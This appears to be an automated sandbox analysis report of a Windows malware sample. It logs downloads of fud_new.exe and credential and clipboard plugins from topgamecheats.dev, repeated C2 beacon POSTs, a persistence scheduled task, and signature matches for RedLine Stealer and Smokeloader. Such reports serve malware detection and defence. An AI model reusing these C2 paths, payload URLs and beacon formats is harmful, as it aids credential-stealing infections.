Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAwNDcyHost: topgamecheats.devContent-Length: 100624Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: Joe Sandbox View IP Address: 93.123.39.96 93.123.39.96
Source: Joe Sandbox View ASN Name: NET1-ASBG NET1-ASBG
Source: global traffic HTTP traffic detected: GET /fud_new.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: topgamecheats.devConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Code function: 0_2_00007FF6A4F114C7 URLDownloadToFileA, 0_2_00007FF6A4F114C7
Source: global traffic HTTP traffic detected: GET /8bjndDcoA3/Plugins/cred64.dll HTTP/1.1Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: GET /8bjndDcoA3/Plugins/clip64.dll HTTP/1.1Host: topgamecheats.dev
Source: unknown DNS traffic detected: queries for: topgamecheats.dev
Source: unknown HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: GhLMDfzXqQ.exe String found in binary or memory: http://%s/%sfud_new.exe%s%sIndex:
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126474433.000002EE50716000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000024.00000003.2896132724.0000000002ED2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126474433.000002EE50716000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/(
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/Plugins/clip64.dll
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/Plugins/clip64.dlls.storage.dll
Source: Dctooux.exe, 00000024.00000003.2896132724.0000000002ED2000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000024.00000002.3366637117.0000000002E72000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000024.00000002.3366637117.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000024.00000003.2896132724.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/Plugins/cred64.dll
Source: Dctooux.exe, 00000024.00000003.2896132724.0000000002ED2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/Plugins/cred64.dllJi
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002E72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/Plugins/cred64.dllf
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php
Source: Dctooux.exe, 00000024.00000002.3366413769.0000000002E30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php32
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1#
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1-
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=11
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002E72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=11-
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1I
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1_
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1dB
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1e
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1i
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1lB
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002E72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1n
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1w
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpG
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpd
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpd5
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpdQ
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpdc
Source: Dctooux.exe, 00000024.00000003.2896132724.0000000002ED2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpfb-62d94b9afd9b
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002ED6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpp
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126474433.000002EE50716000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/e
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126474433.000002EE5073B000.00000004.00000020.00020000.00000000.sdmp, GhLMDfzXqQ.exe, 00000000.00000003.2126420836.000002EE50763000.00000004.00000020.00020000.00000000.sdmp, GhLMDfzXqQ.exe, 00000000.00000002.2131615110.000002EE5073B000.00000004.00000020.00020000.00000000.sdmp, GhLMDfzXqQ.exe, 00000000.00000002.2131615110.000002EE50707000.00000004.00000020.00020000.00000000.sdmp, GhLMDfzXqQ.exe, 00000000.00000003.2126474433.000002EE50716000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/fud_new.exe
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126420836.000002EE50763000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/fud_new.exe)F
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126420836.000002EE50763000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/fud_new.exe.mui
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126420836.000002EE5077C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/fud_new.exeCC:
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126474433.000002EE5075A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/fud_new.exeLMEMP
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126420836.000002EE50763000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/fud_new.exeWWC:
Source: GhLMDfzXqQ.exe, 00000000.00000002.2131615110.000002EE50707000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/fud_new.exed:
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126474433.000002EE5073B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/fud_new.exey
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126420836.000002EE50763000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/r
Source: Amcache.hve.7.dr String found in binary or memory: http://upx.sf.net
Source: GhLMDfzXqQ.exe, 00000000.00000002.2131615110.000002EE50764000.00000004.00000020.00020000.00000000.sdmp, GhLMDfzXqQ.exe, 00000000.00000003.2126420836.000002EE50763000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com

System Summary

Source: 00000004.00000002.2288637913.0000000002DA2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000018.00000002.2290385798.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000018.00000002.2290111678.0000000002EF2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000024.00000002.3366496339.0000000002E34000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000024.00000002.3368787116.0000000004910000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2289959026.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0041FEA7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 4_2_0041FEA7
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0041FEA7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 24_2_0041FEA7
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0041FEA7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 36_2_0041FEA7
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe File created: C:\Windows\Tasks\Dctooux.job
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Code function: 0_2_00007FF6A4F13DB0 0_2_00007FF6A4F13DB0
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Code function: 0_2_00007FF6A4F14FC0 0_2_00007FF6A4F14FC0
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00409DA0 4_2_00409DA0
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0043B163 4_2_0043B163
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00427101 4_2_00427101
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00424123 4_2_00424123
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0044A2E9 4_2_0044A2E9
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00446448 4_2_00446448
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_004294A2 4_2_004294A2
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00424912 4_2_00424912
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0044AA3B 4_2_0044AA3B
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0044AB5B 4_2_0044AB5B
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0044BEA0 4_2_0044BEA0
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00404FE0 4_2_00404FE0
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00445FB0 4_2_00445FB0
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0491A550 4_2_0491A550
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_048F9709 4_2_048F9709
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_048DA007 4_2_048DA007
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0491C107 4_2_0491C107
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_04916217 4_2_04916217
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_048D5247 4_2_048D5247
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_048F438A 4_2_048F438A
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0490B3CA 4_2_0490B3CA
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_048F7368 4_2_048F7368
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0491ACA2 4_2_0491ACA2
